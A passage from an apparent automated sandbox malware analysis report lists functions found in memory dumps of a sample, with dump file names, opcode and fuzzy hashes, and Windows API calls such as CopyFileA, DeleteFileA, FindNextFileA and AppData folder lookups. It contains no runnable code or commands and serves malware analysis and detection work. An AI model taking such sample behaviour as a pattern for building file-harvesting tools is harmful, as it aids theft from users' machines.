                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c55b3e730d90ec08e3de03cafedfee2a8b972110f62ffd9447d402bfef2c7d07
                            • Instruction ID: 642bd96a8348954f318aed3324401e4c81d1bcb51237ec92d72db9453105ee4b
                            • Opcode Fuzzy Hash: c55b3e730d90ec08e3de03cafedfee2a8b972110f62ffd9447d402bfef2c7d07
                            • Instruction Fuzzy Hash: 275128F3E183145BE3186E2DEC8573AF795EBA4720F1A463DDBC893384E97918058296
                            Function 00556DA8 Relevance: .2, Instructions: 175COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 94ebf3405476df85d5ad338346659f1cae8b957088a2dcb1a013470f63ca549c
                            • Instruction ID: 1df098026d57fd8777dfb8c708b5c914362932d137c5168d5afdb216f810ac35
                            • Opcode Fuzzy Hash: 94ebf3405476df85d5ad338346659f1cae8b957088a2dcb1a013470f63ca549c
                            • Instruction Fuzzy Hash: 965114B260D200DFD3046E29EC9553AFBEAFFD8711F66893EE5C687340D9314C488692
                            Function 00420A3D Relevance: .2, Instructions: 166COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 235f36a2de6c18b3db179f7870523031ac770227c53999afb219640397ffb98b
                            • Instruction ID: 4a63185e17980dd7c9ff61db49765caef257fdf950f72c5ba3c4c707ba2a57c5
                            • Opcode Fuzzy Hash: 235f36a2de6c18b3db179f7870523031ac770227c53999afb219640397ffb98b
                            • Instruction Fuzzy Hash: F24189F3A082004FE3545E6DEC8572BBBDADBD0360F16863DDA84D7384FC759801829A
                            Function 0047A8AB Relevance: .1, Instructions: 136COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 73962d69132aadd75215de88fa17c27d5d3cbeca327a16ebd195508631389ac4
                            • Instruction ID: 06ba5644b5456c5dff0faf0b01a6b28f9a67ab1ca654cec196e7328f038fab05
                            • Opcode Fuzzy Hash: 73962d69132aadd75215de88fa17c27d5d3cbeca327a16ebd195508631389ac4
                            • Instruction Fuzzy Hash: 764115F3E042244BF3545D3CDD89366BAD6EB94320F2B423C9BD8977C8E97D49058291
                            Function 003CE1CB Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a795a155ef1b8e3bf23594876594cb59549f76cb8bea7bfaa9de2837683e8a1a
                            • Instruction ID: 2020d2c8aa57db2fbb18f458e79333fd01aff7f9f6493e4f8dbb7624138e1394
                            • Opcode Fuzzy Hash: a795a155ef1b8e3bf23594876594cb59549f76cb8bea7bfaa9de2837683e8a1a
                            • Instruction Fuzzy Hash: D831E7F3A0C210AFF3196E68EC857BBB7D5EB84720F16853DD6C1C2740E97998058696
                            Function 005E49BA Relevance: .1, Instructions: 115COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7bd0be168b8fd6019c3de82d09857fb2869827997c7a837d765da445b081edc
                            • Instruction ID: 1bd05f7c4d0974ed8d85c79b1d12a80c63b259c72f681cb5974436c4bd88d0fb
                            • Opcode Fuzzy Hash: b7bd0be168b8fd6019c3de82d09857fb2869827997c7a837d765da445b081edc
                            • Instruction Fuzzy Hash: C2315BB3A1D2689BE744592AACC1777B78DFB54324F3A4E3BEAC1D3700E5609C005586
                            Function 00568727 Relevance: .1, Instructions: 90COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bdc51e7abcde7c54bb8b9f7d5c43439484d7204f242e3b34ecf69dd8335f0c7
                            • Instruction ID: 61414c9c8f50135d92f3340f5b6ab8b793ae0bab02b398491b58f22772887100
                            • Opcode Fuzzy Hash: 6bdc51e7abcde7c54bb8b9f7d5c43439484d7204f242e3b34ecf69dd8335f0c7
                            • Instruction Fuzzy Hash: 1931BAB240C308DFD3067F29E8856BAFBE4FF28764F06082DD6D582620D6795480DB47
                            Function 0060F19C Relevance: .1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c58f008f0fa8313e976caa5fe7f2d5d26e4c5282a67058069e27d878e9ed1a83
                            • Instruction ID: 59372c6170ebd5918d21e16a920fffac377b2c9be1e596538726f4d03b23a945
                            • Opcode Fuzzy Hash: c58f008f0fa8313e976caa5fe7f2d5d26e4c5282a67058069e27d878e9ed1a83
                            • Instruction Fuzzy Hash: D521F5B280C3149FE315BF68D8817BEFBE8EF18311F02082DDAC493250D63568408B8B
                            Function 001386F0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00138776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001387AD
                            • lstrcpy.KERNEL32(?,00000000), ref: 001387EA
                            • StrStrA.SHLWAPI(?,013FE040), ref: 0013880F
                            • lstrcpyn.KERNEL32(003593D0,?,00000000), ref: 0013882E
                            • lstrlen.KERNEL32(?), ref: 00138841
                            • wsprintfA.USER32 ref: 00138851
                            • lstrcpy.KERNEL32(?,?), ref: 00138867
                            • StrStrA.SHLWAPI(?,013FE520), ref: 00138894
                            • lstrcpy.KERNEL32(?,003593D0), ref: 001388F4
                            • StrStrA.SHLWAPI(?,013FE328), ref: 00138921
                            • lstrcpyn.KERNEL32(003593D0,?,00000000), ref: 00138940
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                            • String ID: %s%s
                            • API String ID: 2672039231-3252725368
                            • Opcode ID: 7fc8dce48c50e5e1002542f8d84139cd2d8fbbea9ecb06debf2a5fec92f1b531
                            • Instruction ID: e71d6732f77f8498ebed5e0e19fbe646dff83356d22eca9ac203ba9c430239bc
                            • Opcode Fuzzy Hash: 7fc8dce48c50e5e1002542f8d84139cd2d8fbbea9ecb06debf2a5fec92f1b531
                            • Instruction Fuzzy Hash: DAF16F75900214EFCB12DB68ED48ADEB7B9EF58302F154595F90AE7260DF70AE05CBA0
                            Function 00121F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121F9F
                            • lstrlen.KERNEL32(013F8FF8), ref: 00121FAE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00121FDB
                            • lstrcat.KERNEL32(00000000,?), ref: 00121FE3
                            • lstrlen.KERNEL32(0015179C), ref: 00121FEE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012200E
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 0012201A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00122042
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0012204D
                            • lstrlen.KERNEL32(0015179C), ref: 00122058
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122075
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122081
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001220AC
                            • lstrlen.KERNEL32(?), ref: 001220E4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122104
                            • lstrcat.KERNEL32(00000000,?), ref: 00122112
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122139
                            • lstrlen.KERNEL32(0015179C), ref: 0012214B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012216B
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00122177
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012219D
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001221A8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001221D4
                            • lstrlen.KERNEL32(?), ref: 001221EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012220A
                            • lstrcat.KERNEL32(00000000,?), ref: 00122218
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122242
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012227F
                            • lstrlen.KERNEL32(013FD448), ref: 0012228D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001222B1
                            • lstrcat.KERNEL32(00000000,013FD448), ref: 001222B9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001222F7
                            • lstrcat.KERNEL32(00000000), ref: 00122304
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012232D
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00122356
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00122382
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001223BF
                            • DeleteFileA.KERNEL32(00000000), ref: 001223F7
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00122444
                            • FindClose.KERNEL32(00000000), ref: 00122453
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                            • String ID:
                            • API String ID: 2857443207-0
                            • Opcode ID: 4830e2a8c634b7280a4b5aee504c01b98124f72f85929927da82e9707cf29fcb
                            • Instruction ID: ca75d69878517e2fedac920e60fdc9f893b8b068926a2f2c54ad23894f87e56e
                            • Opcode Fuzzy Hash: 4830e2a8c634b7280a4b5aee504c01b98124f72f85929927da82e9707cf29fcb
                            • Instruction Fuzzy Hash: 6BE19131A11636BBCB22EF64FC86AAE77B9AF18301F040125F805A7665DB34DD65CB90
                            Function 00136570 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001365A5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001365E0
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013660A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136641
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013666E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
